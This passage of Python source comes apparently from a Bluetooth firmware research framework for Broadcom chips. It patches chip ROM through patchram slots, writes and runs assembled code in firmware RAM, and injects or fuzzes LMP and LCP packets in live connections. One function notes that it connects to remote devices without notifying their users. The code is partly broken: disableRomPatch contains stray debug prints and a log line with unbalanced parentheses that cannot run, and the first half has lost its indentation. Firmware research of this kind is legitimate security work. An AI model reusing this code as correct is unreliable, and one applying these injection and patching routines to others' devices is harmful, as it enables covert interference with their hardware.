self.fw.PATCHRAM_TARGET_TABLE_ADDRESS, slot_count * 4
)
table_val_dump = self.readMem(
self.fw.PATCHRAM_VALUE_TABLE_ADDRESS, slot_count * 4
)
table_addresses = []
table_values = []
slot_dwords = []
slot_bits = []
for dword in range(old_div(slot_count, 32)):
slot_dwords.append(slot_dump[dword * 32 : (dword + 1) * 32])
for dword in slot_dwords:
slot_bits.extend(bits(bytes(dword[::-1]))[::-1])
for i in range(slot_count):
if slot_bits[i]:
table_addresses.append(u32(table_addr_dump[i * 4 : i * 4 + 4]) << 2)
table_values.append(table_val_dump[i * 4 : i * 4 + 4])
else:
table_addresses.append(None)
table_values.append(None)
return (table_addresses, table_values, slot_bits)
def patchRom(self, address, patch, slot=None):
# type: (Address, Any, Optional[Any]) -> bool
"""
Patch a 4-byte value (DWORD) inside the ROM section of the firmware
(0x0 - 0x8FFFF) using the patchram mechanism. There are 128 available
slots for patches and patchRom() will automatically find the next free
slot if it is not forced through the 'slot' argument (see also
getPatchramState()).
address: The address at which the patch should be applied
(if the address is not 4-byte aligned, the patch will be splitted into two slots)
patch: The new value which should be placed at the address (byte string of length 4)
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in [
"PATCHRAM_TARGET_TABLE_ADDRESS",
"PATCHRAM_ENABLED_BITMAP_ADDRESS",
"PATCHRAM_VALUE_TABLE_ADDRESS",
"PATCHRAM_NUMBER_OF_SLOTS",
]:
if const not in dir(self.fw):
log.warn("patchRom: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const)
return False
if len(patch) != 4:
log.warn("patchRom: patch (%s) must be a 32-bit dword!" % patch)
return False
log.debug(
"patchRom: applying patch 0x%x to address 0x%x" % (u32(patch), address)
)
alignment = address % 4
if alignment != 0:
log.debug("patchRom: Address 0x%x is not 4-byte aligned!" % address)
if slot is not None:
log.warn(
"patchRom: Patch must be splitted into two slots, but fixed slot value was enforced. Do nothing!"
)
return False
log.debug("patchRom: applying patch 0x%x in two rounds" % u32(patch))
# read original content
orig = self.readMem(address - alignment, 8)
# patch the difference of the 4 bytes we want to patch within the original 8 bytes
self.patchRom(
address - alignment, orig[:alignment] + patch[: 4 - alignment], slot
)
self.patchRom(
address - alignment + 4,
patch[4 - alignment :] + orig[alignment + 4 :],
slot,
)
return True
table_addresses, table_values, table_slots = self.getPatchramState()
# Check whether the address is already patched:
for i in range(self.fw.PATCHRAM_NUMBER_OF_SLOTS):
if table_addresses[i] == address:
slot = i
log.info(
"patchRom: Reusing slot for address 0x%x: %d" % (address, slot)
)
# Write new value to patchram value table at 0xd0000
self.writeMem(self.fw.PATCHRAM_VALUE_TABLE_ADDRESS + slot * 4, patch)
return True
if slot is None:
# Find free slot:
for i in range(self.fw.PATCHRAM_NUMBER_OF_SLOTS):
if table_addresses[i] is None:
slot = i
log.info("patchRom: Choosing next free slot: %d" % slot)
break
if slot is None:
log.warn("patchRom: All slots are in use!")
return False
else:
if table_values[slot] == 1:
log.warn("patchRom: Slot %d is already in use. Overwriting..." % slot)
# Write new value to patchram value table at 0xd0000
self.writeMem(self.fw.PATCHRAM_VALUE_TABLE_ADDRESS + slot * 4, patch)
# Write address to patchram target table at 0x310000
self.writeMem(
self.fw.PATCHRAM_TARGET_TABLE_ADDRESS + slot * 4, p32(address >> 2)
)
# Enable patchram slot (enable bitfield starts at 0x310204)
# (We need to enable the slot by setting a bit in a multi-dword bitfield)
target_dword = int(old_div(slot, 32))
table_slots[slot] = 1
slot_dword = unbits(
table_slots[target_dword * 32 : (target_dword + 1) * 32][::-1]
)[::-1]
self.writeMem(
self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS + target_dword * 4, slot_dword
)
return True
def disableRomPatch(self, address, slot=None):
# type: (int, Optional[int]) -> bool
"""
Disable a patchram slot (see also patchRom()). The slot can either be
specified by the target address (address that was patched) or by providing
the slot number directly (the address will be ignored in this case).
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in [
"PATCHRAM_TARGET_TABLE_ADDRESS",
"PATCHRAM_ENABLED_BITMAP_ADDRESS",
]:
if const not in dir(self.fw):
log.warn(
"disableRomPatch: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
table_addresses, table_values, table_slots = self.getPatchramState()
print("A\n"*20)
if slot is None:
if address is None:
log.warn("disableRomPatch: address is None.")
return False
for i in range(self.fw.PATCHRAM_NUMBER_OF_SLOTS):
log.info("Slot for address 0x%x used by %d\n" % table_addresses[i], slot))
if table_addresses[i] == address:
slot = i
log.info("Slot for address 0x%x is: %d" % (address, slot))
break
log.info("AAAAAAAAAAAAA")
if slot is None:
log.warn("No slot contains address: 0x%x" % address)
return False
# Disable patchram slot (enable bitfield starts at 0x310204)
# (We need to disable the slot by clearing a bit in a multi-dword bitfield)
target_dword = int(old_div(slot, 32))
table_slots[slot] = 0
slot_dword = unbits(
table_slots[target_dword * 32 : (target_dword + 1) * 32][::-1]
)[::-1]
self.writeMem(
self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS + target_dword * 4, slot_dword
)
# Write 0xFFFFC to patchram target table at 0x310000
# (0xFFFFC seems to be the default value if the slot is inactive)
self.writeMem(
self.fw.PATCHRAM_TARGET_TABLE_ADDRESS + slot * 4, p32(0xFFFFC >> 2)
)
return True
def readConnectionInformation(self, conn_number):
# type: (ConnectionNumber) -> Optional[ConnectionInformation]
"""
Reads and parses a connection struct based on the connection number.
Note: The connection number is different from the connection index!
The connection number starts counting at 1 and is stored in the first
field of the connection structure.
The connection index starts at 0 and is the index into the connection
table (table containing all connection structs).
In the Nexus 5 firmware all connection numbers are simply the connection
index increased by 1.
The return value is a ConnectionInformation object containing all information that could
be parsed from the connection structure. If the connection struct at the
specified connection number is empty, the return value is None.
"""
# Check if constants are defined in fw.py
# Do we have an array implementation?
is_array = True
for const in [
"CONNECTION_MAX",
"CONNECTION_ARRAY_ADDRESS",
"CONNECTION_STRUCT_LENGTH",
]:
if const not in dir(self.fw):
is_array = False
# Do we have a list implementation?
for const in ["CONNECTION_LIST_ADDRESS"]:
if const not in dir(self.fw):
log.warn(
"readConnectionInformation: neither CONNECTION_LIST nor CONNECTION_ARRAY in fw.py. FEATURE NOT SUPPORTED!"
)
return None
if conn_number < 1 or conn_number > self.fw.CONNECTION_MAX:
log.warn(
"readConnectionInformation: connection number out of bounds: %d"
% conn_number
)
return None
if is_array:
connection = self.readMem(
Address(
self.fw.CONNECTION_ARRAY_ADDRESS
+ self.fw.CONNECTION_STRUCT_LENGTH * (conn_number - 1)
),
self.fw.CONNECTION_STRUCT_LENGTH,
)
else:
connection_memaddr = Address(
u32(
self.readMem(
Address(
self.fw.CONNECTION_LIST_ADDRESS + 4 * (conn_number - 1)
),
4,
)
)
)
if connection_memaddr == 0x00000000:
return None
connection = self.readMem(
connection_memaddr, self.fw.CONNECTION_STRUCT_LENGTH
)
if connection == b"\x00" * self.fw.CONNECTION_STRUCT_LENGTH:
return None
conn_dict = ConnectionInformation.from_connection_buffer(connection)
return conn_dict
def sendLmpPacket(
self, opcode, payload="", is_master=True, conn_handle=0x0C, extended_op=False
):
# type: (Opcode, bytes, bool, ConnectionNumber, bool) -> bool
"""
Inject a LMP packet into a Bluetooth connection (i.e. send a LMP packet
to a remote device which is paired and connected with our local device).
This code is using the vendor specific HCI command 0xfc58, which sends
an LMP PDU. Note that Broadcom firmware internally checks opcodes and
lengths, meaning that despite returning success long payloads will be
cut and invalid opcodes might be discarded.
is_master: Determines if we are master or slave within the connection.
conn_handle: The connection handle specifying the connection into which the
packet will be injected. By default, the first connection handle
used by Broadcom is 0x0c.
opcode: The LMP opcode of the LMP packet that will be injected.
payload: The LMP payload of the LMP packet that will be injected.
Can be empty.
extended_op: Set to True if the opcode should be interpreted as extended / escaped
LMP opcode.
Returns True on success and False on failure.
"""
# Check the connection handle
# Range: 0x0000-0x0EFF (all other values reserved for future use)
if conn_handle < 0 or conn_handle > 0x0EFF:
log.warn("sendLmpPacket: connection handle out of bounds: %d" % conn_handle)
return False
# must be string...
if payload is None:
payload = b""
if ((not extended_op) and opcode > (0xFF >> 1)) or (
extended_op and opcode > 0xFF
):
log.warn("sendLmpPacket: opcode out of range!")
return False
# Build the LMP packet
opcode_data = (
p8(opcode << 1 | (not is_master))
if not extended_op
else p8(0x7F << 1 | (not is_master)) + p8(opcode)
)
# Nexus 5 (2012) simply takes any length as argument, but later withdraws bytes if too many were passed.
# Nexus 6P, Raspi 3+ and evaulation board (2014-2018) require a fixed 20 byte length parameter to be passed!
# -> 2 bytes connection handle, 1 byte length, which means 17 bytes for opcode and payload remaining
# sendlmp --data 11223344556677889900112233445566 01 -> actually works
# always pad to 17 data bytes...
data = opcode_data + payload + b"\x00" * (17 - len(opcode_data) - len(payload))
if len(data) > 17:
log.warn(
"sendLmpPacket: Vendor specific HCI command only allows for 17 bytes LMP content."
)
# log.info("packet: " + p16(conn_handle) + p8(len(data)) + data)
result = self.sendHciCommand(
HCI_COMND.VSC_SendLmpPdu,
p16(conn_handle) + p8(len(payload + opcode_data)) + data,
)
if result is None:
log.warn(
"sendLmpPacket: did not get a result from firmware, maybe crashed internally?"
)
return False
else:
error_status = result[3]
if error_status != 0:
log.warn("sendLmpPacket: got error status 0x%02x" % error_status)
return False
return True
def fuzzLmp(self):
# type: ()-> bool
"""
Installs a patch inside the sendLmp HCI handler that allows sending arbitrary
LMP payloads. Afterwards, use sendLmpPacket as before.
Basically, this ignores LM_LmpInfoTable and LM_LmpInfoTableEsc4 contents, but
only via sendLmp HCI and not during normal Link Manager operation.
"""
# Check if constants are defined in fw.py
for const in [
"FUZZLMP_CODE_BASE_ADDRESS",
"FUZZLMP_ASM_CODE",
"FUZZLMP_HOOK_ADDRESS",
]:
if const not in dir(self.fw):
log.warn(
"fuzzLmpPacket: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
# Assemble the snippet and write it to FUZZLMP_CODE_BASE_ADDRESS
code = asm(
self.fw.FUZZLMP_ASM_CODE,
vma=self.fw.FUZZLMP_CODE_BASE_ADDRESS,
arch="thumb",
)
self.writeMem(self.fw.FUZZLMP_CODE_BASE_ADDRESS, code)
# Install a patch in the end of the original sendLmpPdu HCI handler
patch = asm(
"b 0x%x" % self.fw.FUZZLMP_CODE_BASE_ADDRESS,
vma=self.fw.FUZZLMP_HOOK_ADDRESS,
)
if not self.patchRom(self.fw.FUZZLMP_HOOK_ADDRESS, patch):
log.warn("Error writing to patchram when installing fuzzLmp patch!")
return False
return True
def sendLmpPacketLegacy(self, conn_nr, opcode, payload, extended_op=False):
# type: (int, Opcode, bytes, bool) -> bool
"""
Inject a LMP packet into a Bluetooth connection (i.e. send a LMP packet
to a remote device which is paired and connected with our local device).
This is legacy code only running on BCM4339 based on assembly patches.
conn_nr: The connection number specifying the connection into which the
packet will be injected.
opcode: The LMP opcode of the LMP packet that will be injected.
payload: The LMP payload of the LMP packet that will be injected.
Note: The size of the payload is defined by its opcode.
TODO: Go one step deeper in order to send arbitrary length
LMP packets.
extended_op: Set to True if the opcode should be interpreted as extended / escaped
LMP opcode.
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in [
"CONNECTION_MAX",
"SENDLMP_CODE_BASE_ADDRESS",
"SENDLMP_ASM_CODE",
]:
if const not in dir(self.fw):
log.warn(
"sendLmpPacket: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
# connection number bounds check
if conn_nr < 1 or conn_nr > self.fw.CONNECTION_MAX:
log.warn("sendLmpPacket: connection number out of bounds: %d" % conn_nr)
return False
# Build the LMP packet
# (The TID bit will later be set in the assembler code)
opcode_data = p8(opcode << 1) if not extended_op else p8(0x7F << 1) + p8(opcode)
data = opcode_data + payload
# Prepare the assembler snippet by injecting the connection number
# and appending the LMP packet data.
asm_code = self.fw.SENDLMP_ASM_CODE % (conn_nr) # type: str
asm_code_with_data = asm_code + "".join(
[".byte 0x%02x\n" % x for x in data.ljust(20, b"\x00")]
)
# Assemble the snippet and write it to SENDLMP_CODE_BASE_ADDRESS
code = asm(
asm_code_with_data, vma=self.fw.SENDLMP_CODE_BASE_ADDRESS, arch="thumb"
)
self.writeMem(self.fw.SENDLMP_CODE_BASE_ADDRESS, code)
# Invoke the snippet
if self.launchRam(self.fw.SENDLMP_CODE_BASE_ADDRESS):
return True
else:
log.warn("sendLmpPacket: launchRam failed!")
return False
def sendLcpPacket(self, conn_idx, payload):
# type: (ConnectionIndex, bytes) -> bool
"""
Inject a LCP packet into a Bluetooth LE connection (i.e. send a LCP packet
to a remote device which is paired and connected with our local device).
This is code requires assembly patches.
conn_idx: The connection index specifying the connection into which the
packet will be injected, starting at 0.
payload: The LCP opcode and payload of the LCP packet that will be injected.
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in ["SENDLCP_CODE_BASE_ADDRESS", "SENDLCP_ASM_CODE"]:
if const not in dir(self.fw):
log.warn(
"sendLcpPacket: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
# Prepare the assembler snippet by injecting the connection number
# and appending the LMP packet data.
asm_code = self.fw.SENDLCP_ASM_CODE % (conn_idx, len(payload))
asm_code_with_data = asm_code + "".join(
[".byte 0x%02x\n" % x for x in payload.ljust(20, b"\x00")]
)
# Assemble the snippet and write it to SENDLCP_CODE_BASE_ADDRESS
code = asm(
asm_code_with_data, vma=self.fw.SENDLCP_CODE_BASE_ADDRESS, arch="thumb"
)
self.writeMem(self.fw.SENDLCP_CODE_BASE_ADDRESS, code)
# Invoke the snippet
if self.launchRam(self.fw.SENDLCP_CODE_BASE_ADDRESS):
return True
else:
log.warn("sendLcpPacket: launchRam failed!")
return False
def connectToRemoteDevice(self, bt_addr):
# type: (BluetoothAddress) -> None
"""
Send a HCI Connect Command to the firmware. This will setup
a connection (inserted into the connection structure) if the
remote device (specified by bt_addr) accepts.
To be exact: This will most likely send
- LMP_features_req
- LMP_version_req
- LMP_features_req_ext
- LMP_host_connection_req
- LMP_setup_complete
and also other channel-related packets to the remote device.
The devices do not have to be paired and the remote device
does not need to be visible. This will not initiate the
pairing sequence, therefore the remote host will not show
any notification to the user yet, the host is however notified
via HCI that there is an incomming connection.
bt_addr: address of remote device (byte string)
e.g. for 'f8:95:c7:83:f8:11' you would pass
b'\xf8\x95\xc7\x83\xf8\x11'.
"""
# TODO: expose more of the connection create parameters (instead of
# passing 0's.
self.sendHciCommand(
HCI_COMND.Create_Connection, bt_addr[::-1] + b"\x00\x00\x00\x00\x00\x00\x01"
)
def connectToRemoteLEDevice(self, bt_addr, addr_type=0x00):
# type: (BluetoothAddress, int) -> None
"""
Send a HCI LE Create Connection Command to the firmware as
defined in the Bluetooth Core Specification 5.0 p. 1266.
bt_addr: address of remote device (byte string)
e.g. for 'f8:95:c7:83:f8:11' you would pass
b'\xf8\x95\xc7\x83\xf8\x11'.
addr_type: Public Device (0x00), Random Device (0x01), Public
Identity (0x02), Random static Identity (0x03).
"""
# TODO: expose more of the connection create parameters (instead of
# passing 0's.
self.sendHciCommand(
HCI_COMND.LE_Create_Connection,
b"\x60\x00\x30\x00\x00"
+ p8(addr_type)
+ bt_addr[::-1]
+ b"\x01\x18\x00\x28\x00\x00\x00\xd0\x07\x00\x00\x00\x00",
)
def connectionStatusCallback(self, record):
# type: (Record) -> None
"""
HCI Callback function to detect HCI Events related to
Create Connection
"""
_hcipkt = record[0]
if not issubclass(_hcipkt.__class__, hci.HCI_Event):
return
hcipkt: hci.HCI_Event = cast(hci.HCI_Event, _hcipkt) # get HCI Event packet
# Check if event is Connection Create Status Event
if hcipkt.event_code == 0x0F:
if u16(hcipkt.data[2:4]) == 0x0405: # Create Connection HCI Cmd
log.info("[Connection Create initiated]")
return
# Check if event is Connection Create Complete Event
if hcipkt.event_code == 0x03:
status = hcipkt.data[0]
status_str = (
hex(status)
if status not in hcipkt.HCI_COMMAND_ERROR_STR
else hcipkt.HCI_COMMAND_ERROR_STR[status]
)
conn_handle = u16(hcipkt.data[1:3])
btaddr = hcipkt.data[3:9][::-1]
#btaddr_str = ":".join([b.encode("hex") for b in btaddr])
btaddr_str = bytes_to_hex(btaddr)
log.info(
"[Connect Complete: Handle=0x%x Address=%s status=%s]"
% (conn_handle, btaddr_str, status_str)
)
# Also show Disconnect Complete
if hcipkt.event_code == 0x05:
conn_handle = u16(hcipkt.data[1:3])
log.info("[Disconnect Complete: Handle=0x%x]" % (conn_handle))
def coexStatusCallback(self, record):
# type: (Record) -> None
"""
Coexistence Callback Function
Interprets debug counters for coexistence with WiFi/LTE
Call with "sendhcicmd 0xfc90"
"""
hcipkt = record[0] # get HCI Event packet
timestamp = record[5] # get timestamp
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return
# Command complete event with stats
if hcipkt.event_code == 0x0E:
if u16(hcipkt.data[1:3]) == 0xFC90: # Coex Statistics Cmd
coex_grant = u32(hcipkt.data[4:8])
coex_reject = u32(hcipkt.data[8:12])
ratio = 0
if coex_grant > 0:
ratio = coex_reject / float(coex_grant)
log.info(
"[Coexistence Statistics: Grant=%d Reject=%d -> Reject Ratio %.4f]"
% (coex_grant, coex_reject, ratio)
)
return
def readHeapInformation(self):
    # type: () -> Optional[Union[List[HeapInformation], bool]]
    """
    Traverses the double-linked list of BLOC structs and returns them as a
    list of dictionaries. The dicts have the following fields:

    - index:           Index of the BLOC struct inside the double-linked list
    - address:         Address of the BLOC struct
    - list_length:     Number of available buffers currently in the list
    - capacity:        Total number of buffers belonging to the struct
    - buffer_list:     Head of the buffer list (single-linked list)
    - memory:          Address of the backing buffer in memory
    - memory_size:     Size of the backing buffer in memory
    - buffer_size:     Size of a single buffer in the list
    - thread_waitlist: Head of the list of threads, that wait for a buffer to become available
    - waitlist_length: Length of the waiting list
    - prev:            Previous BLOC struct (double-linked list)
    - next:            Next BLOC struct (double-linked list)
    - buffer_headers:  Dictionary containing buffer headers (e.g. free linked list)

    Returns False when the firmware lacks BLOC_HEAD, None when the list is
    corrupted, and the list of dicts otherwise.
    """
    # Check if constants are defined in fw.py
    for const in ["BLOC_HEAD"]:
        if const not in dir(self.fw):
            log.warn(
                "readHeapInformation: '%s' not in fw.py. FEATURE NOT SUPPORTED!"
                % const
            )
            return False

    # Read address of first bloc struct:
    first_bloc_struct_address = Address(u32(self.readMem(self.fw.BLOC_HEAD, 4)))

    # Traverse the double-linked list
    bloclist = []
    current_bloc_struct_address = first_bloc_struct_address
    for index in range(
        100
    ):  # Traverse at most 100 (don't loop forever if linked-list is corrupted)
        # Parsing BLOC struct: 0x30 bytes cover both known struct layouts
        bloc_struct = self.readMem(current_bloc_struct_address, 0x30)

        # New Bloc Struct since ~2014
        if "BLOC_NG" in dir(self.fw):
            # 18-byte layout: next(u32), buffer_size(u16), capacity(u8),
            # <skipped u8>, memory(u32), buffer_list(u32), list_length(u8), <u8>
            # NOTE(review): field index 3 and 7 are intentionally unused here.
            bloc_fields = struct.unpack("IHBBIIBB", bloc_struct[:18])
            current_element = {}
            current_element["index"] = index
            current_element["address"] = current_bloc_struct_address
            current_element["next"] = bloc_fields[0]
            current_element["buffer_size"] = bloc_fields[1]
            current_element["capacity"] = bloc_fields[2]
            current_element["memory"] = bloc_fields[4]
            current_element["buffer_list"] = bloc_fields[5]
            current_element["list_length"] = bloc_fields[6]
            # Each buffer is prefixed with a 4-byte header, hence the +4
            current_element["memory_size"] = current_element["capacity"] * (
                4 + current_element["buffer_size"]
            )
            # current_element["memory_size"] = bloc_fields[6]
            # current_element["thread_waitlist"] = bloc_fields[8]
            # current_element["waitlist_length"] = bloc_fields[9]
            # current_element["prev"] = bloc_fields[11]
            current_element["buffer_headers"] = {}

        # Old BLOC Struct
        else:
            bloc_fields = struct.unpack("I" * 12, bloc_struct)
            # Sanity check: every old-style BLOC struct starts with the
            # magic "BLOC" (compared as little-endian u32 of b"COLB")
            if bloc_fields[0] != u32(b"COLB"):
                log.warn(
                    "readHeapInformation: BLOC double-linked list contains non-BLOC element. abort."
                )
                return None
            current_element = {}
            current_element["index"] = index
            current_element["address"] = current_bloc_struct_address
            current_element["list_length"] = bloc_fields[2]
            current_element["capacity"] = bloc_fields[3]
            current_element["buffer_list"] = bloc_fields[4]
            current_element["memory"] = bloc_fields[5]
            current_element["memory_size"] = bloc_fields[6]
            current_element["buffer_size"] = bloc_fields[7]
            current_element["thread_waitlist"] = bloc_fields[8]
            current_element["waitlist_length"] = bloc_fields[9]
            current_element["next"] = bloc_fields[10]
            current_element["prev"] = bloc_fields[11]
            current_element["buffer_headers"] = {}

        # Parsing buffer headers: read the 4-byte header in front of each
        # buffer slot of the backing memory region
        buffer_size = current_element["buffer_size"] + 4
        for buf_index in range(current_element["capacity"]):
            buffer_address = current_element["memory"] + buf_index * buffer_size
            hdr = u32(self.readMem(buffer_address, 4))
            current_element["buffer_headers"][buffer_address] = hdr

        # Append and iterate; stop when the list wraps around to the head
        # or hits a NULL pointer
        bloclist.append(current_element)
        current_bloc_struct_address = current_element["next"]
        if (
            current_bloc_struct_address == first_bloc_struct_address
            or current_bloc_struct_address == 0
        ):
            break

    return bloclist
def readMemoryPoolStatisticsCallback(self, record):
    # type: (Record) -> Optional[Union[List[MemoryPool], bool]]
    """
    The chip can be put into a mode that enables displaying
    memory pool statistics each second with the HCI command
    0xfd1c (VSC DBFW) 0x50 (Read Memory Pool Statistics).
    Extracted the info about this from a Mojave PacketLogger,
    saw it once on an iPhone XS (Aladdin) in action and then
    tested it on a Samsung Galaxy S10e and it works.

    In contrast to the readHeapInformation command, this does
    not manually traverse and check the heap. This means that
    this variant is faster but cannot perform checks for
    heap corruptions.

    Returns a list of per-pool dicts when a statistics event was
    parsed, otherwise None.

    TODO: There might be more subcommands, maybe also check out
    0x51 (Logging over PCIe) and 0x02 (Write Trace Config).
    """
    _hcipkt = record[0]
    if not issubclass(_hcipkt.__class__, hci.HCI_Event):
        return
    hcipkt: hci.HCI_Event = cast(hci.HCI_Event, _hcipkt)  # get HCI Event packet

    # Vendor-specific event (0xFF) carrying debug dump type 8
    if hcipkt.event_code == 0xFF and hcipkt.data[0:2] == b'\x1b\x08':  # Dump Type 8
        log.debug("[MemPool Statistics Received]")

        # Pool Meta Information: 18 bytes little-endian at data[3:21]
        pool_meta = struct.unpack("<HIIII", hcipkt.data[3:21])
        meta_info = {}
        meta_info["hci_count"] = pool_meta[0]  # Dumped HCI Packet Count
        meta_info["free_min"] = pool_meta[1]  # Free Memory Min Address
        meta_info["free_max"] = pool_meta[2]  # Free Memory Max Address Plus One
        meta_info["time"] = pool_meta[3]  # Timestamp
        meta_info["rfu"] = pool_meta[4]  # RFU
        log.debug(meta_info)

        # Individual Pool Information: 24-byte records starting at offset 21
        pool_list = []
        pool_len = hcipkt.data[2]  # Number of Pools
        for index in range(pool_len):
            pool_fields = struct.unpack("<IIIHHHHHH", hcipkt.data[21+(index*24):21+((index+1)*24)])
            current_element = {}
            current_element["index"] = index
            current_element["base"] = pool_fields[0]  # Base
            current_element["first"] = pool_fields[1]  # First Free
            # Pool name is a 4-char ASCII tag stored as a little-endian u32
            current_element["name"] = pool_fields[2].to_bytes(4, byteorder='little').decode('utf-8')  # Name
            current_element["size"] = pool_fields[3]  # Block Size
            current_element["count"] = pool_fields[4]  # Block Count
            current_element["low"] = pool_fields[5]  # Low Watermark
            current_element["allocated"] = pool_fields[6]  # Allocated Blocks
            current_element["free"] = pool_fields[7]  # Free Blocks
            current_element["die"] = pool_fields[8]  # Die Reserve Count
            log.debug(current_element)
            pool_list.append(current_element)

        # We're called asynchronous so we can return but printing in the
        # command line does not really make sense.
        log.info((
            "\n> Pools at {time}, Min Addr 0x{free_min:06X}, "
            "Max Addr 0x{free_max:06X}"
        ).format(**meta_info))
        log.info(" Name @ Base: Size Alloc / Cnt 1st Free Low Die ")
        log.info(" ----------------------------------------------------------")
        for pool in pool_list:
            log.info((
                " {name} @ 0x{base:06X}: {size:6d}"
                " {allocated:3d} / {count:3d} "
                "0x{first:06X} {low:3d} {die:3d}"
            ).format(**pool))
        return pool_list
    return
def readQueueInformation(self):
    # type: () -> Optional[List[QueueElement]]
    """
    Traverses the double-linked list of QUEUE structs and returns them as a
    list of QueueElement objects with the following fields:

    - index:           Index of the QUEUE struct inside the double-linked list
    - address:         Address of the QUEUE struct
    - item_size:       Size of a single queue item (in Byte)
    - capacity:        Total number of queue items belonging to the struct
    - available_items: Number of valid queue items ready to be retrieved
    - free_slots:      Number of free item slots
    - queue_buf_start: Pointer to the beginning of the queue buffer
    - queue_buf_end:   Pointer to the end of the queue buffer
    - next_item:       Pointer to the next item to be retrieved from the queue
    - next_free_slot:  Pointer to the next free item slot to be filled
    - thread_waitlist: Head of the list of threads, that wait for a buffer to become available
    - waitlist_length: Length of the waiting list
    - prev:            Previous QUEUE struct (double-linked list)
    - next:            Next QUEUE struct (double-linked list)
    - items:           List of queue items (raw bytes)
    - name:            Name of the queue (from reverse engineering its usage)

    Returns None when the feature is unsupported or the list is corrupted.
    """
    # Check if constants are defined in fw.py
    for const in ["QUEUE_HEAD"]:
        if const not in dir(self.fw):
            log.warn(
                "readQueueInformation: '%s' not in fw.py. FEATURE NOT SUPPORTED!"
                % const
            )
            return None

    # Read address of first queue struct:
    first_queue_struct_address = u32(self.readMem(self.fw.QUEUE_HEAD, 4))

    # Traverse the double-linked list
    queuelist = []
    current_queue_struct_address = first_queue_struct_address
    for index in range(
        100
    ):  # Traverse at most 100 (don't loop forever if linked-list is corrupted)
        queue_struct = self.readMem(current_queue_struct_address, 0x38)
        queue_fields = struct.unpack("I" * 14, queue_struct)
        # Sanity check: every QUEUE struct starts with the magic "QUEU"
        # (compared as little-endian u32 of b"UEUQ")
        if queue_fields[0] != u32(b"UEUQ"):
            log.warn(
                "readQueueInformation: QUEUE double-linked list contains non-QUEU element. abort."
            )
            return None

        # Robustness fix: don't crash with IndexError if the firmware has
        # more queues than reverse-engineered names.
        if index < len(self.fw.QUEUE_NAMES):
            queue_name = self.fw.QUEUE_NAMES[index]
        else:
            queue_name = "UNKNOWN_QUEUE_%d" % index

        current_element = QueueElement(
            index,
            current_queue_struct_address,
            queue_fields[2] * 4,  # item size is stored in 32-bit words
            queue_fields[3],
            queue_fields[4],
            queue_fields[5],
            queue_fields[6],
            queue_fields[7],
            queue_fields[8],
            queue_fields[9],
            queue_fields[10],
            queue_fields[11],
            queue_fields[12],
            queue_fields[13],
            queue_name,
        )
        queuelist.append(current_element)

        current_queue_struct_address = current_element["next"]
        # Bug fix: also terminate on a NULL pointer (consistent with
        # readHeapInformation) instead of reading struct data from address 0.
        if (
            current_queue_struct_address == first_queue_struct_address
            or current_queue_struct_address == 0
        ):
            break
    return queuelist
def enableBroadcomDiagnosticLogging(self, enable):
    # type: (bool) -> None
    """
    Broadcom implemented their own H4 layer protocol. Normally H4 handles HCI
    messages like HCI commands, SCO and ACL data, and HCI events. Their types are
    0x01-0x04. Broadcoms proprietary message type is 0x07 to handle diagnostic
    messages.

    Diagnostic logging sets a variable checked for any LMP/LCP message when
    sending and receiving and then forwarding its contents prepended with 0x07.

    In principle, diagnostic logging can be enabled on Android by directly
    writing to the serial Bluetooth device:

        echo -ne '\x07\xf0\x01' >/dev/ttyHS

    However, Androids Bluetooth driver is not properly parsing message type 0x07.
    This causes the driver to crash when enabling diagnostics like this. A
    custom Bluetooth driver is required, which accepts diagnostic commands
    and also forwards diagnostic message outputs to the BT Snoop Log.

    Args:
        enable: True to enable diagnostic logging, False to disable it.
    """
    if not self.serial:
        # Bug fix: the conditional expression binds looser than "+", so the
        # original code sent a bare b"\x00" (without the 0xf0 opcode) when
        # disabling. Parenthesize so the 0xf0 prefix is always included.
        self.sendH4(hci.HCI.BCM_DIAG, b"\xf0" + (b"\x01" if enable else b"\x00"))
    # We can send the activation to the serial, but then the Android driver
    # itself crashes when receiving diagnostic frames...
    else:
        log.warn("Diagnostic protocol requires modified Android driver!")
def enableEnhancedAdvReport(self):
    # type: () -> bool
    """
    Broadcom and Cypress chips can extend the "Event Type" field in LE Advertising
    Reports with information on the channel, antenna, and scan mode.
    Parsing this enhanced advertisement report is "documented" in the PacketDecoder
    binary of Apple's PacketLogger, which is part of the Additional Tools for XCode.
    The function parsing these is called `leAdvertisingEventTypeString` (XCode 11.4).

    Usually, the Event Type field is set to 0x00-0x04, meaning ADV_IND..SCAN_RSP.
    Additional fields:

        channel = (event_type >> 4) & 7
        antenna = event_type & 0x80
        scan_mode = (event_type >> 3) & 3

    The channel is a value 0--2, which corresponds to 37--39.
    The antenna is 0 for BT and 1 for WLAN.
    No idea about the scan mode ;)

    The Broadcom and Cypress firmware sets these additional fields when the firmware
    flag `bEnhancedAdvReport` is set. We do not know how to set it via VSC HCI and if that
    is possible, so we set it by directly writing to RAM.

    TODO: Also implement for the MacBook 2016, it's at 0x2037D0, but we don't know
    the current LMP version, as it changes with each macOS patch level.

    Won't Fix:
    * The Nexus 5 BLE implementation is too old, `lculp_HandleScanReport` (0x184D0) and
      `_scanTaskRxHeaderDone` (0x16E74) do not reference this flag yet.
    * Also seems to be missing in the Nexus 6P/Samsung Galaxy S6 but didn't check as careful.

    Returns true if the feature is supported and could be enabled.
    """
    # Check if constants are defined in fw.py
    if "ENHANCED_ADV_REPORT_ADDRESS" not in dir(self.fw):
        log.warn(
            "enableEnhancedAdvReport: 'ENHANCED_ADV_REPORT_ADDRESS' not in fw.py. FEATURE NOT SUPPORTED!"
        )
        return False
    self.writeMem(self.fw.ENHANCED_ADV_REPORT_ADDRESS, b'\x01\x00\x00\x00')
    # Bug fix: the signature promises a bool, but the success path fell
    # through and returned None. Report success explicitly.
    return True
def _setupSockets(self):
    """Set up the transport sockets towards the chip. Must be implemented
    by the concrete subclass."""
    raise NotImplementedError()
